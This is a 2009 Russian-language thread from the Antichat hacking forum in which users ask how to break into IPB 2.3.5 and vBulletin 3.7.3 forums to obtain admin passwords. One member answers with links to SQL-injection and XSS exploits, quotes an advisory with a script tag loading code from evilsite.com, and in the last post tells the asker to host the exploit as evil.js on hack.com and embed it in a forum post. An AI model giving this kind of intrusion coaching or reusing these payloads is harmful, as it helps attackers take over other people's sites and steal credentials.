ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.02.2009, 08:42
Аватар для it's mу
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию

точно немогу сказать, так как не пользовал мубэбэ, но посмотри алгоритм создания куки, возможно есть вариант подделать
 
Ответить с цитированием

  #2  
Старый 16.02.2009, 02:54
Аватар для Tepp
Tepp
Новичок
Регистрация: 06.02.2009
Сообщений: 3
Провел на форуме:
3377

Репутация: 0
По умолчанию

Народ подскажите пожалуйста как взломать форум IPB 2.3.5?
Нужно узнать пароль админа
 
Ответить с цитированием

  #3  
Старый 16.02.2009, 08:21
Аватар для it's mу
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию

Цитата:
Сообщение от Tepp  
Народ подскажите пожалуйста как взломать форум IPB 2.3.5?
Нужно узнать пароль админа
http://milw0rm.com/exploits/6507 <= 2.3.5 Remote SQL Injection Exploit
http://milw0rm.com/exploits/6325 <= 2.3.5 Multiple Vulnerabilities Exploit (revised)

Последний раз редактировалось it's mу; 16.02.2009 в 08:31..
 
Ответить с цитированием

  #4  
Старый 17.02.2009, 19:42
Аватар для 1ce666
1ce666
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме:
2144019

Репутация: 214
По умолчанию

Нужно узнать пароль админа! двиг булка 3.7.3 .
PS: C меня плюсы
PSS: папка install не удалена! Мало ли...

Последний раз редактировалось 1ce666; 17.02.2009 в 19:56..
 
Ответить с цитированием

  #5  
Старый 18.02.2009, 05:05
Аватар для it's mу
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию

Цитата:
Сообщение от 1ce666  
Нужно узнать пароль админа! двиг булка 3.7.3 .
PS: C меня плюсы
PSS: папка install не удалена! Мало ли...
http://www.hackzone.ru/exploit/view/id/3249/
 
Ответить с цитированием

  #6  
Старый 18.02.2009, 12:32
Аватар для 1ce666
1ce666
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме:
2144019

Репутация: 214
По умолчанию

Цитата:
Сообщение от it's mу  
http://www.hackzone.ru/exploit/view/id/3249/
А как пользоваться? Я новичёк в этом и нужно учиться
 
Ответить с цитированием

  #7  
Старый 18.02.2009, 12:38
Аватар для it's mу
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию

Цитата:
Сообщение от 1ce666  
А как пользоваться? Я новичёк в этом и нужно учиться
:/ там есть описание:
Цитата:
Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
with the visitor messages addon (a clone of a social network wall/comment area).
When posting XSS, the data is run through htmlentities(); before being displayed
to the general public/forum members. However, when posting a new message,
a new notification is sent to the commentee. The commenter posts a XSS vector such as
<script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
and I have included an example worm that makes the user post a new thread with your own
specified subject and message.
 
Ответить с цитированием

  #8  
Старый 18.02.2009, 01:18
Аватар для 1ce666
1ce666
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме:
2144019

Репутация: 214
По умолчанию

И как раскрыть путь в булке 3.7.3 ?
 
Ответить с цитированием

  #9  
Старый 18.02.2009, 12:41
Аватар для 1ce666
1ce666
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме:
2144019

Репутация: 214
По умолчанию

Цитата:
- Описание = критическая уязвимость существует в новых Справка 3.7.3 программное обеспечение, которое поставляется включен
с посетителем сообщений аддон (клон социальной сети стены / комментарий область).
При публикации XSS, данные проходят через htmlentities (); затем отображается
для широкой публики / участники форума. Однако, при отправке нового сообщения
новое уведомление направляется commentee. Комментатор должности XSS вектор таких, как
<script src="http://evilsite.com/nbd.js">, и когда commentee посещений usercp.php
в рамках домена, они били нефильтрованное XSS приложу. XSRF также легко доступны
и я включил пример червя, что позволяет пользователю создать новое нить с вашими собственными
указанной темы и сообщения.
Вот какой перевод получился , обьясни в крадце пожалуйста
C меня плюсы
 
Ответить с цитированием

  #10  
Старый 18.02.2009, 12:45
Аватар для it's mу
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию

пихаешь сплоит в evil.js и льешь к себе на hack.com пишешь пост и цепляешь яваскрипт <script src=http://hack.com/evil.js>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ *NIX ] Задай вопрос - получи ответ. Xszz *nix 1547 15.06.2010 15:41
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ